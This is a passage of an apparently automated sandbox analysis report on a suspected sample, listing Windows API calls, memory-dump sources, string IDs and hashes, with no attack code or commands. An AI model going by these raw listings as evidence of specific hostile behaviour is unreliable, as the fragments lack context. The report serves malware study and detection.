                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00655862
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00655878
                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 006558ED
                                                      • WSACleanup.WSOCK32 ref: 006558F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: 5d40c6dcbb474c97fe4c13901f12de5ff53bc31b9bfe9d72459f515152a863b0
                                                      • Instruction ID: 499da48eaf5a249f7477cb56a7088c90a83fd17a054da75330925a660cb1bc93
                                                      • Opcode Fuzzy Hash: 5d40c6dcbb474c97fe4c13901f12de5ff53bc31b9bfe9d72459f515152a863b0
                                                      • Instruction Fuzzy Hash: 3F51BE316047119FDB10EF25DC59B6ABBE6EF48721F048929F996DB2A1DB70E804CB42
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0064B4D0
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0064B546
                                                      • GetLastError.KERNEL32 ref: 0064B550
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0064B5BD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: a7905155f4a6e24abbb9a8c43015e8d9b1d59e30f196eedb411691615a7bfd5a
                                                      • Instruction ID: 24444abf9df6e4e801f8838936e3b04d754e858ed86b25590173e96aca075c61
                                                      • Opcode Fuzzy Hash: a7905155f4a6e24abbb9a8c43015e8d9b1d59e30f196eedb411691615a7bfd5a
                                                      • Instruction Fuzzy Hash: 53318175A0020ADFCB08EF68D885AEDBBB6FF49310F145125E505D7291DB71DA42CB51
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 006661EB
                                                      • GetDC.USER32(00000000), ref: 006661F3
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006661FE
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0066620A
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00666246
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00666257
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0066902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00666291
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006662B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID: @U=u
                                                      • API String ID: 3864802216-2594219639
                                                      • Opcode ID: 3576df7cad9dd477040942c79777d70db95d717ad922387df323f76caace4ecf
                                                      • Instruction ID: c6959887cb4d52bbd8bdb9474e579d35786c1ff5da74bf4c6035c1c6a3edf40d
                                                      • Opcode Fuzzy Hash: 3576df7cad9dd477040942c79777d70db95d717ad922387df323f76caace4ecf
                                                      • Instruction Fuzzy Hash: C7317172101210BFEB118F50EC4AFEA3BAEEF4A755F044065FE08DA291C6B59C41CB74
                                                      APIs
                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00647A6C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ArraySafeVartype
                                                      • String ID:
                                                      • API String ID: 1725837607-0
                                                      • Opcode ID: ddedfeb4c02204751c0ea2d231355e1a9a1676a29fb4f7826604ef193f0f0bbc
                                                      • Instruction ID: e32646786919a091c697db7b9bbff4c1796925981fec866453e7b39f9009e0d5
                                                      • Opcode Fuzzy Hash: ddedfeb4c02204751c0ea2d231355e1a9a1676a29fb4f7826604ef193f0f0bbc
                                                      • Instruction Fuzzy Hash: D1B19F7190821A9FDB00DFA4D885BBEB7F6FF09321F244429E941EB291D774E941CBA4
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 006411F0
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00640268,?,00000001), ref: 00641204
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0064120B
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00640268,?,00000001), ref: 0064121A
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0064122C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00640268,?,00000001), ref: 00641245
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00640268,?,00000001), ref: 00641257
                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00640268,?,00000001), ref: 0064129C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00640268,?,00000001), ref: 006412B1
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00640268,?,00000001), ref: 006412BC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: ac9fc350f42f54c1eab5821676a10aec299af46170c465d1c9a20db0eee7ed1a
                                                      • Instruction ID: 4c35f815ff8b7f5ce6c1640d933983ecf42397744b4f19616d17e1e5d4ce4514
                                                      • Opcode Fuzzy Hash: ac9fc350f42f54c1eab5821676a10aec299af46170c465d1c9a20db0eee7ed1a
                                                      • Instruction Fuzzy Hash: 2E319C75600204BFDB20AF55FD88FAA77ABEB56311F155125F900CA2A0E7F4AEC08F61
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 005EFAA6
                                                      • OleUninitialize.OLE32(?,00000000), ref: 005EFB45
                                                      • UnregisterHotKey.USER32(?), ref: 005EFC9C
                                                      • DestroyWindow.USER32(?), ref: 006245D6
                                                      • FreeLibrary.KERNEL32(?), ref: 0062463B
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00624668
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: 62882fd1fa545cf59f29bb50f0b84374b0217df73c40ea86120f5e052a30d1fc
                                                      • Instruction ID: 2c53fca2e7f7591cbdbeb622a0dd86e7fde725f1acb9d680cf80a399964bbadd
                                                      • Opcode Fuzzy Hash: 62882fd1fa545cf59f29bb50f0b84374b0217df73c40ea86120f5e052a30d1fc
                                                      • Instruction Fuzzy Hash: 75A18F30701622CFCB2DEF15D598A69FB66BF45700F2042ADE84AAB261DF30AD16CF50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$_memset
                                                      • String ID: ,,g$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2862541840-4066664511
                                                      • Opcode ID: bd2252c1db28344edbb54b51abbee60b67fb1d49d3389dd8be734f9c43798276
                                                      • Instruction ID: bc09864f6a58e38b584c0ee9885bd64212fb149ae3510b44a8467d91435714f5
                                                      • Opcode Fuzzy Hash: bd2252c1db28344edbb54b51abbee60b67fb1d49d3389dd8be734f9c43798276
                                                      • Instruction Fuzzy Hash: AA919E71A00219EBDF24CFA5CC48FEEBBBAEF45711F108159F915AB280D7709949CBA0
                                                      APIs
                                                      • EnumChildWindows.USER32(?,0063A439), ref: 0063A377
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ChildEnumWindows
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 3555792229-1603158881
                                                      • Opcode ID: dba73fd4d84c002cdea72c89433e6710cb102ae18888a4a8ca8d8f130530d899
                                                      • Instruction ID: a7282b114481159392367f04c7b76b0a19d0b728cbc8d841b38c79e8625b1b0f
                                                      • Opcode Fuzzy Hash: dba73fd4d84c002cdea72c89433e6710cb102ae18888a4a8ca8d8f130530d899
                                                      • Instruction Fuzzy Hash: 5A919630A04606AADF4CDFE0C445BEEFBBAFF04300F548119E499A7291DB316A59EBD5
                                                      APIs
                                                      • IsWindow.USER32(00CB5880), ref: 0066B3EB
                                                      • IsWindowEnabled.USER32(00CB5880), ref: 0066B3F7
                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0066B4DB
                                                      • SendMessageW.USER32(00CB5880,000000B0,?,?), ref: 0066B512
                                                      • IsDlgButtonChecked.USER32(?,?), ref: 0066B54F
                                                      • GetWindowLongW.USER32(00CB5880,000000EC), ref: 0066B571
                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0066B589
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                      • String ID: @U=u
                                                      • API String ID: 4072528602-2594219639
                                                      • Opcode ID: e3afe14c297604f21266a663d8443bad9c365b07df1623cb2ac9133b3364936a
                                                      • Instruction ID: 75374bb6b19af6f1b449fdfd4df1a3f5a97b8a0be092597355472a304240dcfd
                                                      • Opcode Fuzzy Hash: e3afe14c297604f21266a663d8443bad9c365b07df1623cb2ac9133b3364936a
                                                      • Instruction Fuzzy Hash: F8716C34604214EFDB20DF54D894FFA7BABEF0A300F146059E956E73A6CB72A981CB50
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00666E24
                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00666E38
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00666E52
                                                      • _wcscat.LIBCMT ref: 00666EAD
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00666EC4
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00666EF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcscat
                                                      • String ID: @U=u$SysListView32
                                                      • API String ID: 307300125-1908207174
                                                      • Opcode ID: 9ea32da7e6a8b55ffd20ecc96ba9cd6c8787a812983be6ddbe0771243ead6524
                                                      • Instruction ID: 9f7082989e1ed0f690b3be1848619473400daa433e8f2af8331e3f3ce56bbefc
                                                      • Opcode Fuzzy Hash: 9ea32da7e6a8b55ffd20ecc96ba9cd6c8787a812983be6ddbe0771243ead6524
                                                      • Instruction Fuzzy Hash: B241B170A00349EBDF21DF64DC85BEEB7EAEF08350F10042AF595E7291D6729D848B60
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00651A50
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00651A7C
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00651ABE
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00651AD3
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00651AE0
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00651B10
                                                      • InternetCloseHandle.WININET(00000000), ref: 00651B57
                                                        • Part of subcall function 00652483: GetLastError.KERNEL32(?,?,00651817,00000000,00000000,00000001), ref: 00652498
                                                        • Part of subcall function 00652483: SetEvent.KERNEL32(?,?,00651817,00000000,00000000,00000001), ref: 006524AD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                      • String ID:
                                                      • API String ID: 2603140658-3916222277
                                                      • Opcode ID: 217ce46290cae20b14077adcda078e02ab1e2671f7848acbf6fee9cad2a863c7
                                                      • Instruction ID: 2f0459a2cc7a434ca2da40851a926383d697e9e20b4192527ae65a106516fc4d
                                                      • Opcode Fuzzy Hash: 217ce46290cae20b14077adcda078e02ab1e2671f7848acbf6fee9cad2a863c7
                                                      • Instruction Fuzzy Hash: 2D4181B1501219BFEB128F50DC85FFB7BAEEF09355F00412AFD059A241E7B09E499BA4
                                                      APIs
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 006662EC
                                                      • GetWindowLongW.USER32(00CB5880,000000F0), ref: 0066631F
                                                      • GetWindowLongW.USER32(00CB5880,000000F0), ref: 00666354
                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00666386
                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006663B0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 006663C1
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006663DB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID: @U=u
                                                      • API String ID: 2178440468-2594219639
                                                      • Opcode ID: 847f1d816c9367f9ed2a882334a2cdf28f6e1dffd64f48079537be060df3bb74
                                                      • Instruction ID: c2b940e0235f8ec7d77de1cf7c39ab1f451cbb4c9c70094da99fa3c1ef6a5460
                                                      • Opcode Fuzzy Hash: 847f1d816c9367f9ed2a882334a2cdf28f6e1dffd64f48079537be060df3bb74
                                                      • Instruction Fuzzy Hash: 5D31C231644150AFDB21DF19EC84F9937E6BB4A714F1921A8F512EB3B2CB71AC409B51
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0066F910), ref: 00658D28
                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0066F910), ref: 00658D5C
                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00658ED6
                                                      • SysFreeString.OLEAUT32(?), ref: 00658F00
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                      • String ID:
                                                      • API String ID: 560350794-0
                                                      • Opcode ID: dba4fad118b42402557000a3cf20cf1aa771c7e4fdf1e94527b12ad2110ab6b0
                                                      • Instruction ID: 6ba5c72f0d354c12e5d58ef2e29f14de2afcfab101a658e440b2b628c243219a
                                                      • Opcode Fuzzy Hash: dba4fad118b42402557000a3cf20cf1aa771c7e4fdf1e94527b12ad2110ab6b0
                                                      • Instruction Fuzzy Hash: 82F10A71A00109EFDB14DF94C888EEEB7BAFF49315F108558F905AB251DB71AE4ACB60
                                                      APIs
                                                      • _memset.LIBCMT ref: 0065F6B5
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0065F848
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0065F86C
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0065F8AC
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0065F8CE
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0065FA4A
                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0065FA7C
                                                      • CloseHandle.KERNEL32(?), ref: 0065FAAB
                                                      • CloseHandle.KERNEL32(?), ref: 0065FB22
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                      • String ID:
                                                      • API String ID: 4090791747-0
                                                      • Opcode ID: d6edb508025a0c6f190ed2a111f6482105a3be6a06d666b754d4068716ba783d
                                                      • Instruction ID: c012638f25caa212f16aaa461ddea33942641a4d586880ce589d297624c801a2
                                                      • Opcode Fuzzy Hash: d6edb508025a0c6f190ed2a111f6482105a3be6a06d666b754d4068716ba783d
                                                      • Instruction Fuzzy Hash: C4E1BE312043419FC714EF24D895BAABBE6BF89314F14896DF8899B3A2CB71DC45CB52
                                                      APIs
                                                        • Part of subcall function 0064466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00643697,?), ref: 0064468B
                                                        • Part of subcall function 0064466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00643697,?), ref: 006446A4
                                                        • Part of subcall function 00644A31: GetFileAttributesW.KERNEL32(?,0064370B), ref: 00644A32
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00644D40
                                                      • _wcscmp.LIBCMT ref: 00644D5A
                                                      • MoveFileW.KERNEL32(?,?), ref: 00644D75
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                      • String ID:
                                                      • API String ID: 793581249-0
                                                      • Opcode ID: c6c77a96b2bb0105f1413414be3b7a157fa7979e26c2170a71e561f69d390c3b
                                                      • Instruction ID: 67b7c3eb8b036d099b9e276a1fac9f3a73cecb8d9971713e281cdde7f38dec40
                                                      • Opcode Fuzzy Hash: c6c77a96b2bb0105f1413414be3b7a157fa7979e26c2170a71e561f69d390c3b
                                                      • Instruction Fuzzy Hash: 7A5187B24083859BC764DBA0DC85ADFB7EDAF85354F00092EF285D3191EF71A588C75A
                                                      APIs
                                                        • Part of subcall function 0063A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0063A84C
                                                        • Part of subcall function 0063A82C: GetCurrentThreadId.KERNEL32 ref: 0063A853
                                                        • Part of subcall function 0063A82C: AttachThreadInput.USER32(00000000,?,00639683,?,00000001), ref: 0063A85A
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0063968E
